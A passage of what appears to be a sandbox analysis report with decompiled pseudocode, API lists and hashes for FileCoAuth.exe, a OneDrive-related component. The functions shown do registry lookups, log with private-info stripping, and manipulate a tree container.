    				_t130 = E00E9F0AC(_t195, _t241, _t242, _t246, 0x80000001, _t244 - 0x40, 0, _t244 - 0x108);
    				_t243 = _t130;
    				 *(_t244 - 4) = 0;
    				E00E94307(_t244 - 0x40, 1, 0);
    				if(_t130 < 0) {
    					L33:
    					 *(_t244 - 4) =  *(_t244 - 4) | 0xffffffff;
    					E00E94EF3(_t244 - 0x108);
    					return E00EA3152(_t195 & 0xffffff00 |  *((intOrPtr*)(_t244 - 0xfc)) > 0x00000000, _t241, _t243);
    				} else {
    					_t243 =  *((intOrPtr*)(_t244 - 0x108));
    					_t241 =  *((intOrPtr*)(_t244 - 0x104));
    					while(_t243 != _t241) {
    						E00E9A1D7(_t244 - 0x40, _t243);
    						 *(_t244 - 4) = 2;
    						__eflags =  *((intOrPtr*)(_t195 + 0x14)) - 8;
    						if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
    							_t195 =  *_t195;
    						}
    						E00E94E9D(_t244 - 0xa4, _t195);
    						 *(_t244 - 4) = 3;
    						_t140 = E00E9F1E6(_t244 - 0xa4, 0x80000001, _t244 - 0xa4, _t244 - 0x40, 0, _t244 - 0x110);
    						 *(_t244 - 4) = 2;
    						E00E94307(_t244 - 0xa4, 1, 0);
    						__eflags = _t140;
    						if(_t140 < 0) {
    							L30:
    							_t195 =  *(_t244 - 0xf4);
    							goto L31;
    						} else {
    							_t143 =  *((intOrPtr*)(_t244 + 0xc));
    							__eflags = _t143;
    							if(_t143 == 0) {
    								L11:
    								_t144 = 0;
    								__eflags = 0;
    								L12:
    								_t211 =  *((intOrPtr*)(_t244 - 0x10c));
    								__eflags =  *((char*)(_t211 + 0x44));
    								if( *((char*)(_t211 + 0x44)) == 0) {
    									L15:
    									__eflags =  *((intOrPtr*)(_t244 - 0x30));
    									if( *((intOrPtr*)(_t244 - 0x30)) != 0) {
    										_t198 =  *((intOrPtr*)(_t244 - 0xf8));
    										_push(_t244 - 0x40);
    										E00E9B7D8( *((intOrPtr*)(_t244 - 0xf8)),  *_t198 + 0x64, _t240, _t241);
    										 *((intOrPtr*)(_t244 - 0xfc)) =  *((intOrPtr*)(_t244 - 0xfc)) + 1;
    										 *((intOrPtr*)(_t244 - 0x48)) = 0;
    										 *((intOrPtr*)(_t244 - 0x44)) = 0;
    										 *((char*)(_t244 - 0xed)) = 0;
    										 *((intOrPtr*)(_t244 - 0x44)) = 7;
    										 *((intOrPtr*)(_t244 - 0x48)) = 0;
    										 *((short*)(_t244 - 0x58)) = 0;
    										 *(_t244 - 4) = 4;
    										E00E9A1D7(_t244 - 0x28, _t244 - 0x40);
    										 *(_t244 - 4) = 5;
    										__eflags = E00E99650( *_t198, 0,  *((intOrPtr*)( *_t198 + 0x10)), L"Personal", E00E94E74(L"Personal"));
    										if(__eflags != 0) {
    											E00EA0545(_t244 - 0x12c, _t241, _t243, __eflags);
    											 *(_t244 - 4) = 6;
    											_t200 =  *((intOrPtr*)(_t244 - 0xf8));
    											__eflags = E00E9944F( *_t200 + 0x30, _t244 - 0x40);
    											if(__eflags != 0) {
    												__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
    												_push(0);
    												_t179 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
    												_push( >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
    												 *((char*)(_t244 - 0xed)) = 1;
    												_push(_t244 - 0xec);
    												_t181 = E00E9FB8B(_t200, _t241, _t243,  *((intOrPtr*)(_t244 - 0x14)) - 8);
    												 *(_t244 - 4) = 7;
    												_t234 = _t244 - 0x28;
    												__eflags = _t244 - 0x28 - _t181;
    												if(_t244 - 0x28 != _t181) {
    													E00E94BDD(_t234, _t181, 0, 0xffffffff);
    												}
    												 *(_t244 - 4) = 6;
    												E00E94307(_t244 - 0xec, 1, 0);
    												__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
    												_push( *0xeb0030);
    												_t184 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
    												_push( >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
    												_push(_t244 - 0xd4);
    												_t186 = E00E9FF3D(_t200, _t244 - 0xec, _t241, _t243,  *((intOrPtr*)(_t244 - 0x14)) - 8);
    												 *(_t244 - 4) = 8;
    												_t236 = _t244 - 0x28;
    												__eflags = _t244 - 0x28 - _t186;
    												if(_t244 - 0x28 != _t186) {
    													E00E94BDD(_t236, _t186, 0, 0xffffffff);
    												}
    												 *(_t244 - 4) = 6;
    												E00E94307(_t244 - 0xd4, 1, 0);
    											}
    											_push(_t244 - 0x28);
    											_push( *_t200);
    											_push(_t244 - 0xbc);
    											_t157 = E00EA08C3(_t200, _t244 - 0x12c, _t240, _t241, _t243, __eflags);
    											 *(_t244 - 4) = 9;
    											E00E990AD(_t244 - 0x58, _t157);
    											 *(_t244 - 4) = 6;
    											_t159 = E00E94307(_t244 - 0xbc, 1, 0);
    											 *(_t244 - 4) = 5;
    											E00E99365(_t159, _t244 - 0x12c);
    										} else {
    											E00E94DF9(_t244 - 0x58, __eflags, L"{018D5C66-4533-4307-9B53-224DE2ED1FE6}", E00E94E74(L"{018D5C66-4533-4307-9B53-224DE2ED1FE6}"));
    										}
    										E00E9A1D7(_t244 - 0x8c, _t244 - 0x58);
    										 *(_t244 - 4) = 0xa;
    										__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
    										_t164 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
    										E00E94E9D(_t244 - 0x74,  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
    										 *(_t244 - 4) = 0xb;
    										_t201 =  *((intOrPtr*)(_t244 - 0xed));
    										__eflags = _t201;
    										 *((char*)(_t244 - 0x5c)) = 0 | _t201 == 0x00000000;
    										 *(_t244 - 4) = 0xc;
    										 *((char*)(_t244 - 0x114)) = 0;
    										_push( *((intOrPtr*)(_t244 - 0x114)));
    										_t170 = E00E9AE39( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8)))) + 0x70)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8)))) + 0x74)), _t244 - 0x8c);
    										_t228 =  *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8))));
    										__eflags = _t170 -  *((intOrPtr*)(_t228 + 0x74));
    										if(_t170 ==  *((intOrPtr*)(_t228 + 0x74))) {
    											_push(_t244 - 0x8c);
    											__eflags = _t201;
    											if(_t201 == 0) {
    												_push( *((intOrPtr*)(_t228 + 0x70)));
    												__eflags = _t228 + 0x70;
    												_push(_t244 - 0x118);
    												E00E9B762(_t228 + 0x70, _t228 + 0x70);
    											} else {
    												E00E9B7AA(_t228 + 0x70, _t240);
    											}
    										}
    										 *(_t244 - 4) = 5;
    										E00E94F21(_t244 - 0x8c);
    										 *(_t244 - 4) = 4;
    										E00E94307(_t244 - 0x28, 1, 0);
    										 *(_t244 - 4) = 2;
    										E00E94307(_t244 - 0x58, 1, 0);
    									}
    									goto L30;
    								}
    								__eflags = _t144;
    								if(_t144 != 0) {
    									goto L15;
    								}
    								_t195 =  *(_t244 - 0xf4);
    								E00E9EF24(0x80000001, _t195, _t244 - 0x40, 0);
    								L31:
    								 *(_t244 - 4) = 0;
    								E00E94307(_t244 - 0x40, 1, 0);
    								_t243 = _t243 + 0x18;
    								__eflags = _t243;
    								continue;
    							}
    							__eflags = _t143 -  *((intOrPtr*)(_t244 - 0x110));
    							if(_t143 !=  *((intOrPtr*)(_t244 - 0x110))) {
    								goto L11;
    							}
    							_t144 = 1;
    							goto L12;
    						}
    					}
    					goto L33;
    				}
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9DBEE
      • Part of subcall function 00E99650: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00E9946E,00000000,?,?,?), ref: 00E99664
    Similarity
    • API ID: H_prolog3_Xout_of_range@std@@
    • String ID: Personal${018D5C66-4533-4307-9B53-224DE2ED1FE6}
    • API String ID: 1689176233-2726138255
    • Opcode ID: 232c90f9cad63ec7b2ac7122f2ce8732ef5b2afe7b176d539b4dbe89f05e97eb
    • Instruction ID: 3542d6fd9da6179641aa0ff4d31f1dba4dfcb54cbc9e90a7534fe918387465c0
    • Opcode Fuzzy Hash: 232c90f9cad63ec7b2ac7122f2ce8732ef5b2afe7b176d539b4dbe89f05e97eb
    • Instruction Fuzzy Hash: 09C1AD70904268EEDF20DBA4CD81FDDBBB4AF15304F1450D9E545BB182DB70AE85CB62
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 60%
    			E00E93F0C(char* __edx, char _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr _v12;
    				short _v16;
    				void* _v20;
    				signed int _v24;
    				char _v32;
    				short _v36;
    				char _v40;
    				char _v48;
    				char _v52;
    				intOrPtr* _v60;
    				char _v68;
    				intOrPtr _v72;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				char _v92;
    				char _v96;
    				char _v112;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t33;
    				char _t35;
    				intOrPtr* _t40;
    				intOrPtr* _t44;
    				void* _t49;
    				intOrPtr* _t51;
    				void* _t53;
    				intOrPtr _t57;
    				void* _t58;
    				intOrPtr* _t74;
    				void* _t75;
    				void* _t78;
    				signed int _t79;
    
    				_t70 = __edx;
    				_t81 = (_t79 & 0xfffffff8) - 0x44;
    				_t33 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t33 ^ (_t79 & 0xfffffff8) - 0x00000044;
    				_t35 = _a4;
    				_t57 = _a8;
    				_t74 = _a12;
    				_v68 = _t35;
    				if(_t74 != 0) {
    					_v12 = 7;
    					 *_t74 = 0;
    					_v32 = 0;
    					_t60 =  *((intOrPtr*)(_t35 + 0x24));
    					_v36 = 0;
    					_v16 = 0;
    					_t70 =  &_v32;
    					_t77 =  *((intOrPtr*)( *( *((intOrPtr*)(_t35 + 0x24)))))(_t57,  &_v32);
    					_t39 =  >=  ? _v40 :  &_v40;
    					_v72 =  >=  ? _v40 :  &_v40;
    					_t40 =  &_v68;
    					__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t40, _t57);
    					if( *((intOrPtr*)(_t40 + 0x14)) >= 8) {
    						_t40 =  *_t40;
    					}
    					E00E93B35(_t60, _t40, _v80, _t77);
    					E00E94307( &_v92, 1, 0);
    					if(_t77 >= 0) {
    						_t70 =  &_v48;
    						_t49 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v84 + 0x24)))) + 8))( &_v48, 1, _t57,  &_v52);
    						_t77 = _t49;
    						if(_t49 >= 0) {
    							_t68 =  &_v68;
    							_t77 = E00E941C7( &_v68, _t74);
    							_t51 =  &_v96;
    							__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t51, _t57);
    							if( *((intOrPtr*)(_t51 + 0x14)) >= 8) {
    								_t51 =  *_t51;
    							}
    							E00E93BF5(_t68, _t51, _t77);
    							_t53 = E00E94307( &_v112, 1, 0);
    							if(_t77 >= 0 &&  *_t74 == 0) {
    								_push("SyncEngineFileInfoProvider::GetPropertyHandlerFromPath");
    								_t70 = 0x2c;
    								E00E93DB4(_t53, _t70);
    								_t77 = 0x80004005;
    							}
    						}
    					}
    					E00E94307( &_v48, 1, 0);
    					_t44 = _v60;
    					if(_t44 != 0) {
    						 *((intOrPtr*)( *_t44 + 8))(_t44);
    					}
    				}
    				_pop(_t75);
    				_pop(_t78);
    				_pop(_t58);
    				return E00EA29F2(_t58, _v24 ^ _t81, _t70, _t75, _t78);
    			}


    Instruction addresses (one per decompiled statement, in listing order; 0x00000000 = no address): 0x00e93f0c, 0x00e93f14, 0x00e93f17, 0x00e93f1e, 0x00e93f22, 0x00e93f26, 0x00e93f2b, 0x00e93f2e, 0x00e93f34, 0x00e93f42, 0x00e93f4c, 0x00e93f4e, 0x00e93f53, 0x00e93f56, 0x00e93f5a, 0x00e93f5e, 0x00e93f6d, 0x00e93f73, 0x00e93f78, 0x00e93f7c, 0x00e93f82, 0x00e93f8c, 0x00e93f8e, 0x00e93f8e, 0x00e93f97, 0x00e93fa4, 0x00e93fab, 0x00e93fbc, 0x00e93fc3, 0x00e93fc6, 0x00e93fca, 0x00e93fcd, 0x00e93fd6, 0x00e93fd8, 0x00e93fde, 0x00e93fe8, 0x00e93fea, 0x00e93fea, 0x00e93fef, 0x00e93ffc, 0x00e94003, 0x00e9400a, 0x00e94011, 0x00e94012, 0x00e94017, 0x00e94017, 0x00e94003, 0x00e93fca, 0x00e94024, 0x00e94029, 0x00e9402f, 0x00e94034, 0x00e94034, 0x00e94037, 0x00e9403d, 0x00e9403e, 0x00e9403f, 0x00e9404a

    APIs
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?), ref: 00E93F82
    • ?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z.LOGGINGPLATFORM(?,?,?), ref: 00E93FDE
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E9400A
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: FromInfoPrivateString@@StripU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath
    • API String ID: 969308733-2558438510
    • Opcode ID: 098339bd4d6c11a02f4f66a3265d9247ed42670b588cd4f846659a9457c7842f
    • Instruction ID: 16831cc0a30416eed9ca2c55e0971a5dadfed999c6b39df81d64cdeaaf2bf970
    • Opcode Fuzzy Hash: 098339bd4d6c11a02f4f66a3265d9247ed42670b588cd4f846659a9457c7842f
    • Instruction Fuzzy Hash: 42415CB1605301AFC714DF24C885E5BBBF8EF89714F40591DFA45AB2A1D731E905CB92
    Uniqueness Score: -1,00%

    C-Code - Quality: 82%
    			E00E9AF0A(intOrPtr* __ecx, intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr* _a20) {
    				intOrPtr _t47;
    				intOrPtr* _t49;
    				intOrPtr _t50;
    				intOrPtr* _t51;
    				intOrPtr* _t69;
    				intOrPtr* _t72;
    				intOrPtr _t74;
    				intOrPtr _t75;
    				intOrPtr _t76;
    				intOrPtr* _t81;
    				intOrPtr* _t83;
    				intOrPtr* _t84;
    				intOrPtr* _t85;
    				intOrPtr* _t86;
    				char** _t87;
    
    				_t72 = __ecx;
    				_t47 =  *((intOrPtr*)(__ecx + 4));
    				if(_t47 >= 0x3fffffe) {
    					_t86 = _a20;
    					_t47 = E00E94F21(_t86 + 0x10);
    					L00EA29EC();
    					 *_t87 = "map/set<T> too long";
    					__imp__?_Xlength_error@std@@YAXPBD@Z(_t86);
    				}
    				_t84 = _a20;
    				 *((intOrPtr*)(_t72 + 4)) = _t47 + 1;
    				_t49 = _a12;
    				 *((intOrPtr*)(_t84 + 4)) = _t49;
    				_t74 =  *_t72;
    				if(_t49 != _t74) {
    					if(_a8 == 0) {
    						 *((intOrPtr*)(_t49 + 8)) = _t84;
    						_t75 =  *_t72;
    						if(_t49 ==  *((intOrPtr*)(_t75 + 8))) {
    							 *((intOrPtr*)(_t75 + 8)) = _t84;
    						}
    					} else {
    						 *_t49 = _t84;
    						_t81 =  *_t72;
    						if(_t49 ==  *_t81) {
    							 *_t81 = _t84;
    						}
    					}
    				} else {
    					 *((intOrPtr*)(_t74 + 4)) = _t84;
    					 *((intOrPtr*)( *_t72)) = _t84;
    					 *((intOrPtr*)( *_t72 + 8)) = _t84;
    				}
    				_t50 =  *((intOrPtr*)(_t84 + 4));
    				_t85 = _t84;
    				while( *((char*)(_t50 + 0xc)) == 0) {
    					_t51 =  *((intOrPtr*)(_t85 + 4));
    					_t83 =  *((intOrPtr*)(_t51 + 4));
    					_t76 =  *_t83;
    					if(_t51 != _t76) {
    						if( *((char*)(_t76 + 0xc)) != 0) {
    							if(_t85 ==  *_t51) {
    								_t85 = _t51;
    								E00E95088(_t72, _t85);
    							}
    							 *((char*)( *((intOrPtr*)(_t85 + 4)) + 0xc)) = 1;
    							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
    							E00E95042(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)));
    							L20:
    							_t50 =  *((intOrPtr*)(_t85 + 4));
    							continue;
    						}
    						L16:
    						 *((char*)(_t51 + 0xc)) = 1;
    						 *((char*)(_t76 + 0xc)) = 1;
    						 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
    						_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4));
    						goto L20;
    					}
    					_t76 =  *((intOrPtr*)(_t83 + 8));
    					if( *((char*)(_t76 + 0xc)) == 0) {
    						goto L16;
    					}
    					if(_t85 ==  *((intOrPtr*)(_t51 + 8))) {
    						_t85 = _t51;
    						E00E95042(_t72, _t85);
    					}
    					 *((char*)( *((intOrPtr*)(_t85 + 4)) + 0xc)) = 1;
    					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)) + 0xc)) = 0;
    					E00E95088(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t85 + 4)) + 4)));
    					goto L20;
    				}
    				 *((char*)( *((intOrPtr*)( *_t72 + 4)) + 0xc)) = 1;
    				_t69 = _a4;
    				 *_t69 = _t84;
    				return _t69;
    			}


    Instruction addresses (one per decompiled statement, in listing order; 0x00000000 = no address): 0x00e9af10, 0x00e9af14, 0x00e9af1c, 0x00e9af1e, 0x00e9af24, 0x00e9af2a, 0x00e9af2f, 0x00e9af36, 0x00e9af36, 0x00e9af3c, 0x00e9af40, 0x00e9af43, 0x00e9af46, 0x00e9af49, 0x00e9af4d, 0x00e9af61, 0x00e9af6f, 0x00e9af72, 0x00e9af77, 0x00e9af79, 0x00e9af79, 0x00e9af63, 0x00e9af63, 0x00e9af65, 0x00e9af69, 0x00e9af6b, 0x00e9af6b, 0x00e9af69, 0x00e9af4f, 0x00e9af4f, 0x00e9af54, 0x00e9af58, 0x00e9af58, 0x00e9af7c, 0x00e9af7f, 0x00e9b019, 0x00e9af86, 0x00e9af89, 0x00e9af8c, 0x00e9af90, 0x00e9afce, 0x00e9afec, 0x00e9afee, 0x00e9aff3, 0x00e9aff3, 0x00e9affd, 0x00e9b007, 0x00e9b011, 0x00e9b016, 0x00e9b016, 0x00000000, 0x00e9b016, 0x00e9afd0, 0x00e9afd0, 0x00e9afd4, 0x00e9afde, 0x00e9afe5, 0x00000000, 0x00e9afe5, 0x00e9af92, 0x00e9af99, 0x00000000, 0x00000000, 0x00e9af9e, 0x00e9afa0, 0x00e9afa5, 0x00e9afa5, 0x00e9afaf, 0x00e9afb9, 0x00e9afc3, 0x00000000, 0x00e9afc3, 0x00e9b028, 0x00e9b02c, 0x00e9b02f, 0x00e9b035

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9AF2A
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(?), ref: 00E9AF36
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@Xlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2313657577-1285458680
    • Opcode ID: 1fbcdded918270fdf0a2706d65a80e80e16406577dc64a454b8f35bcc3b6078d
    • Instruction ID: d7576bfa74b9199cea47d1d6d6d733e2751069a53c2a90d8c2b1d0559f1a1284
    • Opcode Fuzzy Hash: 1fbcdded918270fdf0a2706d65a80e80e16406577dc64a454b8f35bcc3b6078d
    • Instruction Fuzzy Hash: FD411771200640CFCB11DF19C188A65BBE1EF5A328F19D4A9E859AF362C776EC46CF91
    Uniqueness Score: -1,00%

    C-Code - Quality: 87%
    			E00EA21C0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t60;
    				signed int _t69;
    				intOrPtr* _t77;
    				intOrPtr* _t81;
    				short _t84;
    				void* _t85;
    				void* _t87;
    
    				_push(0x50);
    				E00EA3194(E00EA5653, __ebx, __edi, __esi);
    				_t69 =  *(_t85 + 0x14);
    				_t81 =  *((intOrPtr*)(_t85 + 0xc));
    				 *(_t85 - 0x5c) = _t69;
    				E00E94E9D(_t85 - 0x58, L"Software\\Classes\\CLSID\\");
    				 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
    				E00E95904(_t85 - 0x58,  *((intOrPtr*)(_t85 + 8)), 0, 0xffffffff);
    				 *((intOrPtr*)(_t85 - 0x18)) = 0;
    				_t84 = 0;
    				 *((intOrPtr*)(_t85 - 0x14)) = 0;
    				 *_t69 = 0;
    				 *((intOrPtr*)(_t85 - 0x14)) = 7;
    				 *((intOrPtr*)(_t85 - 0x18)) = 0;
    				 *((short*)(_t85 - 0x28)) = 0;
    				 *(_t85 - 4) = 1;
    				E00E94E9D(_t85 - 0x40, 0xea7340);
    				 *(_t85 - 4) = 2;
    				_t87 = E00E9F290(0x80000001, _t85 - 0x58, _t85 - 0x40,  *((intOrPtr*)(_t85 + 0x10)), _t85 - 0x28);
    				_t70 = _t69 & 0xffffff00 | _t87 > 0x00000000;
    				 *(_t85 - 4) = 1;
    				E00E94307(_t85 - 0x40, 1, 0);
    				if((_t69 & 0xffffff00 | _t87 > 0x00000000) != 0) {
    					if( *((intOrPtr*)(_t81 + 0x14)) < 8) {
    						_t77 = _t81;
    					} else {
    						_t77 =  *_t81;
    					}
    					_t60 =  >=  ?  *((void*)(_t85 - 0x28)) : _t85 - 0x28;
    					__imp__CompareStringOrdinal(_t60, 0xffffffff, _t77, 0xffffffff, 1);
    					if((_t60 & 0xffffff00 | _t60 != 0x00000002) != 0) {
    						 *( *(_t85 - 0x5c)) = 1;
    						E00E94E9D(_t85 - 0x40, 0xea7340);
    						 *(_t85 - 4) = 3;
    						_t84 = E00E9F5DC(0x80000001, _t85 - 0x58, _t85 - 0x40, _t81,  *((intOrPtr*)(_t85 + 0x10)), 0);
    						 *(_t85 - 4) = 1;
    						E00E94307(_t85 - 0x40, 1, 0);
    					}
    				}
    				 *(_t85 - 4) = 0;
    				E00E94307(_t85 - 0x28, 1, 0);
    				 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
    				E00E94307(_t85 - 0x58, 1, 0);
    				return E00EA3152(_t70, _t81, _t84);
    			}


    Instruction addresses (one per decompiled statement, in listing order): 0x00ea21c0, 0x00ea21c7, 0x00ea21cc, 0x00ea21d5, 0x00ea21dd, 0x00ea21e0, 0x00ea21e5, 0x00ea21f1, 0x00ea21f8, 0x00ea21fb, 0x00ea21fd, 0x00ea2200, 0x00ea2202, 0x00ea2209, 0x00ea220c, 0x00ea2210, 0x00ea221c, 0x00ea2221, 0x00ea223e, 0x00ea2240, 0x00ea2243, 0x00ea224d, 0x00ea2254, 0x00ea225a, 0x00ea2260, 0x00ea225c, 0x00ea225c, 0x00ea225c, 0x00ea226b, 0x00ea2275, 0x00ea2283, 0x00ea2290, 0x00ea2293, 0x00ea2298, 0x00ea22b4, 0x00ea22b6, 0x00ea22c1, 0x00ea22c1, 0x00ea2283, 0x00ea22c6, 0x00ea22d1, 0x00ea22d6, 0x00ea22e1, 0x00ea22ed

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA21C7
      • Part of subcall function 00E95904: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
      • Part of subcall function 00E95904: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
      • Part of subcall function 00E9F290: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00E9F2D9
      • Part of subcall function 00E9F290: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 00E9F328
      • Part of subcall function 00E9F290: RegCloseKey.ADVAPI32(?), ref: 00E9F374
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
    • CompareStringOrdinal.KERNEL32(?,000000FF,?,000000FF,00000001,00000001,00000000,00EA7340,?,00000000,000000FF,Software\Classes\CLSID\,00000050,00EA2310,?,?), ref: 00EA2275
    Strings
    • Software\Classes\CLSID\, xrefs: 00EA21D8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@CloseCompareH_prolog3_OpenOrdinalQueryStringValueXlength_error@std@@Xout_of_range@std@@
    • String ID: Software\Classes\CLSID\
    • API String ID: 1024312143-2087380861
    • Opcode ID: 96e1f6d5bf8235d97d9488a9beb4e580aaa3569b637b484a5e11af41db7646ae
    • Instruction ID: acbbba48738831576471641150a8c36b7f0b93e496bd915ba840f50ed392e661
    • Opcode Fuzzy Hash: 96e1f6d5bf8235d97d9488a9beb4e580aaa3569b637b484a5e11af41db7646ae
    • Instruction Fuzzy Hash: 35415971905249EEDF01DBE4CC46FEDBBB4AF1A314F141158E610BB1C1D7B0AA45CBA1
    Uniqueness Score: -1,00%

    C-Code - Quality: 58%
    			E00E9404D(signed int* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
    				signed int _v8;
    				signed int _v12;
    				char _v36;
    				void* __ebx;
    				void* __edi;
    				signed int _t20;
    				intOrPtr* _t24;
    				signed int _t27;
    				intOrPtr* _t32;
    				void* _t34;
    				intOrPtr _t37;
    				intOrPtr _t38;
    				signed int* _t47;
    				void* _t49;
    				signed int _t50;
    
    				_t48 = __esi;
    				_t46 = __edx;
    				_t20 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t20 ^ _t50;
    				_t38 = _a4;
    				_t37 = _a8;
    				_t47 = _a12;
    				if(_t47 != 0) {
    					 *_t47 =  *_t47 & 0x00000000;
    					_t46 =  &_v12;
    					_t39 =  *((intOrPtr*)(_t38 + 0x24));
    					_v12 = _v12 & 0x00000000;
    					_t49 =  *((intOrPtr*)( *( *((intOrPtr*)(_t38 + 0x24))) + 4))(2, _t37,  &_v12, __esi);
    					_t24 =  &_v36;
    					__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t24, _t37);
    					if( *((intOrPtr*)(_t24 + 0x14)) >= 8) {
    						_t24 =  *_t24;
    					}
    					E00E93C8A(_t39, _t24, _t49);
    					E00E94307( &_v36, 1, 0);
    					if(_t49 >= 0) {
    						_t44 =  &_v12;
    						_t49 = E00E941C7( &_v12, _t47);
    						_t32 =  &_v36;
    						__imp__?StripPrivateInfoFromString@@YG?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PB_W@Z(_t32, _t37);
    						if( *((intOrPtr*)(_t32 + 0x14)) >= 8) {
    							_t32 =  *_t32;
    						}
    						E00E93DE2(_t44, _t32, _t49);
    						_t34 = E00E94307( &_v36, 1, 0);
    						if(_t49 >= 0 &&  *_t47 == 0) {
    							_push("SyncEngineFileInfoProvider::GetPropertyHandlerFromUri");
    							_t46 = 0x4f;
    							E00E93DB4(_t34, _t46);
    							_t49 = 0x80004005;
    						}
    					}
    					_t27 = _v12;
    					if(_t27 != 0) {
    						 *((intOrPtr*)( *_t27 + 8))(_t27);
    					}
    					_pop(_t48);
    				}
    				return E00EA29F2(_t37, _v8 ^ _t50, _t46, _t47, _t48);
    			}


